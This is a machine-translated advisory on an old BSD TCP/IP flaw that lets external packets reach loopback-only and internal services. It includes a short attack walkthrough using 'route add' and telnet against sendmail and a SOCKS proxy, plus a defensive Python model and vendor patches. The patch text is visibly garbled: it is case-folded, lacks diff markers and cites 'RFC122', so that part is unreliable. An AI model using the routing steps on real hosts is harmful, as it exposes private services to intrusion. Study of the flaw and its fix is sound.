Routing vulnerability in the TCP/IP stack (BSD, defect)
(Transferred from Tianluo Technology)
Recommended procedures:
Loopback and multi-homed
Description:
Loopback and multi-homed routing vulnerability in the TCP/IP stack
Details:
There is a vulnerability in the BSD TCP/IP stack: packets addressed to the loopback interface or to another of the machine's network interfaces are accepted when they arrive through a different interface, even if the machine's routing configuration does not allow that route. Services that are designed to be reachable only from within the machine itself, or only from an internal network, can therefore be reached from outside. This exposes the host, and the networks next to it, to further attack, for example through a buffer overflow in one of those services.
**** The following is intended only for testing and studying this vulnerability. If you use it improperly, you bear the consequences yourself ****
Assume 213.129.64.x is the public network and 172.16.x.x the internal private hosts. The server 213.129.64.1 runs sendmail on port 25 to provide SMTP only to local programs. The attacker is on 213.129.64.2.
213.129.64.2# route delete 127.0.0.1
delete host 127.0.0.1
213.129.64.2# route add 127.0.0.1 213.129.64.1
add host 127.0.0.1: gateway 213.129.64.1
213.129.64.2# telnet 127.0.0.1 25
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 eeek.woodyland.not ESMTP Sendmail blah blah blah blah
If 213.129.64.1 runs a SOCKS service that is meant only for its internal network, bound to 172.16.1.1:
213.129.64.2# route add 172.16.1.1 213.129.64.1
add host 172.16.1.1: gateway 213.129.64.1
213.129.64.2# telnet 172.16.1.1 1080
Trying 172.16.1.1...
Connected to 172.16.1.1.
Escape character is '^]'.
213.129.64.2# export SOCKS_SERVER=172.16.1.1
213.129.64.2# rtelnet 172.16.1.2
Trying 172.16.1.2...
Connected to kerpow.woodyland.not
Escape character is '^]'.
02/02/01 22:25:32 on /dev/con1
Last login: 02/02/01 21:22:54 on /dev/con1
login:
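To make the two cases above concrete from the defender's side, here is a small Python model of the ip_input() decision "is this packet for us?". It is an added example, not code from the advisory or from any BSD source tree. The interface names lo0, ext0 and int0 and the address table are constructed to match the scenario in the text; `patched=True` applies the two checks found in the vendor fixes given in the solution section (the FreeBSD test that the matching address belongs to the receiving interface, and the NetBSD rule that 127/8 must not arrive on a non-loopback interface). The result `not_ours` stands for "no local delivery; handed to the forwarding path", which is an assumption about what follows the check rather than something the advisory states.

```python
"""
Model of the BSD ip_input() decision "is this packet for us?", with and
without the loopback / multi-homed fix described in the advisory.

Added example; not code from the advisory or from any BSD source tree.
The interface table is constructed to match the advisory's scenario:
public host 213.129.64.1 with private address 172.16.1.1.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Iface:
    name: str
    addr: ipaddress.IPv4Address
    loopback: bool = False


# Constructed interface table for the server 213.129.64.1.
HOST_IFACES = (
    Iface("lo0", ipaddress.IPv4Address("127.0.0.1"), loopback=True),
    Iface("ext0", ipaddress.IPv4Address("213.129.64.1")),
    Iface("int0", ipaddress.IPv4Address("172.16.1.1")),
)

LOOPBACK_NET = ipaddress.IPv4Network("127.0.0.0/8")


def classify(src, dst, rcvif, ifaces=HOST_IFACES, patched=True):
    """Classify a packet src -> dst that arrived on interface `rcvif`.

    Returns:
      'ours'     - delivered to a local socket (e.g. sendmail on port 25)
      'drop'     - discarded by the 127/8-on-the-wire check
      'not_ours' - no local delivery; handed to the forwarding path, which
                   discards it unless the host is configured as a router
                   (assumed behaviour, not modelled further here)
    """
    src = ipaddress.IPv4Address(src)
    dst = ipaddress.IPv4Address(dst)
    by_name = {i.name: i for i in ifaces}
    if rcvif not in by_name:
        raise ValueError(f"unknown interface {rcvif}")
    rcv = by_name[rcvif]

    # NetBSD-style check: 127/8 must not appear on the wire (RFC 1122), so
    # a loopback source or destination is only acceptable on a loopback
    # interface.  This check does not exist before the fix.
    if patched and not rcv.loopback and (src in LOOPBACK_NET or dst in LOOPBACK_NET):
        return "drop"

    for ia in ifaces:
        if ia.addr != dst:
            continue
        if not patched:
            # Before the fix: any configured local address matches, no
            # matter which interface the packet arrived on.  This is what
            # lets 213.129.64.2 reach 127.0.0.1:25 or 172.16.1.1:1080.
            return "ours"
        # FreeBSD-style check: the matching address must belong to the
        # receiving interface, or the packet must have come in on a
        # loopback interface (locally generated traffic to any of the
        # host's own addresses is looped back through lo0).
        if ia.name == rcv.name or rcv.loopback:
            return "ours"
        return "not_ours"
    return "not_ours"


def advisory_scenarios(patched):
    """The two cases from the advisory plus legitimate local traffic."""
    return {
        "external -> 127.0.0.1 (sendmail)":
            classify("213.129.64.2", "127.0.0.1", "ext0", patched=patched),
        "external -> 172.16.1.1 (SOCKS)":
            classify("213.129.64.2", "172.16.1.1", "ext0", patched=patched),
        "local program -> 127.0.0.1":
            classify("127.0.0.1", "127.0.0.1", "lo0", patched=patched),
        "local program -> own 172.16.1.1":
            classify("213.129.64.1", "172.16.1.1", "lo0", patched=patched),
    }


if __name__ == "__main__":
    for state in (False, True):
        print(f"patched={state}")
        for name, result in advisory_scenarios(state).items():
            print(f"  {name:36s} {result}")
```

With `patched=False` both attacker cases come back as `ours`, which is the behaviour the two telnet sessions above exploit. With `patched=True` the loopback case is dropped outright and the SOCKS case is no longer treated as local, while the two locally originated connections, which reach the stack through lo0, keep working; that loopback exception is why the FreeBSD condition includes the IFF_LOOPBACK test.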
Affected systems:
FreeBSD
OpenBSD
NetBSD
Solution:
FreeBSD 4.2 has added the following patch:
--- /usr/src/sys/netinet/ip_input.c.org sun dec 17 16:04:49 2000
/usr/src/sys/netinet/ip_input.c MON DEC 18 16:46:14 2000
@@ -486, 7 486, 9 @@
IP_fw_fwd_addr-> sin_addr.s_addr)
Goto urs;
#ELSE
- IF (IA_SIN (IA) -> SIN_ADDR.S_ADDR == IP-> ip_dst.s_addr)
IF (IA_SIN (IA) -> sin_addr.s_addr == ip-> ip_dst.s_addr && (IA-> IA_IFP == m-> m_pkthdr.rcvif
|| M-> m_pkthdr.rcvif-> if_flags & iff_loopback))
Goto urs;
#ENDIF
IF (IA-> IA_IFP && IA-> IA_IFP-> if_flags & iff_broadcast)
{
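Review bot: the two replacement lines of the condition (`if (ia_sin(ia)->sin_addr.s_addr == ip->ip_dst.s_addr && (ia->ia_ifp == m->m_pkthdr.rcvif` and the `|| m->m_pkthdr.rcvif->if_flags & IFF_LOOPBACK))` continuation) carry no leading `+`, and the whole hunk has been case-folded, so it cannot be applied with patch(1) from this copy; take it from the ip_input.c revision named in the header instead. On the logic: the new test only treats a packet as local when the matching address belongs to the interface it arrived on, or when it arrived on a loopback interface, which keeps locally generated connections to 127.0.0.1 and to the host's own internal address working while rejecting the external-interface case from the advisory. A packet that fails the test falls through to the forwarding code that is not in the hunk, so whether it is actually discarded also depends on IP forwarding being off; this change does not by itself reject 127/8 traffic arriving from the wire.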
OpenBSD: no patch has been released yet.
NetBSD: apply the patch below to sys/netinet/ip_input.c
*** IP_INPUT.C 2001/03/01 16:31:39 1.128
--- IP_INPUT.C 2001/03/02 02:05:36 1.129
****************
*** 416, 421 ****
--- 416,428 ----
IF (IP-> IP_SRC.S_ADDR)) {
/ * Xxx stat * /
Goto Bad;
}
/ * 127/8 Must Not Appear on Wire - RFC122 * /
IF ((NTOHL (IP-> IP_DST.S_ADDR) >> in_classa_nshift) ==
IN_LOOPBACKNET ||
(NTOHL (IP-> IP_SRC.S_ADDR) >> in_classa_nshift) ==
IN_LOOPBACKNET) {
IF ((m-> m_pkthdr.rcvif-> if_flags & iff_loopback) == 0)
GOTO BAD;
}
IF (IN_CKSUM (M, HLEN)! = 0) {
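Review bot: the comment on the new block cites `RFC122`; the requirement that 127/8 never appear on the wire is from RFC 1122 (Host Requirements), so the comment should read `RFC 1122`. The added lines also lack the `+ ` markers a context diff needs and the first context line `if (ip->ip_src.s_addr)) {` is truncated, so this copy is not directly applicable either. On scope: the check drops any packet with a loopback source or destination that arrives on a non-loopback interface, which closes the sendmail-on-127.0.0.1 case, but it does nothing for the multi-homed case where 172.16.1.1 is reached through the public interface; that case needs an interface-ownership test like the one in the FreeBSD change above.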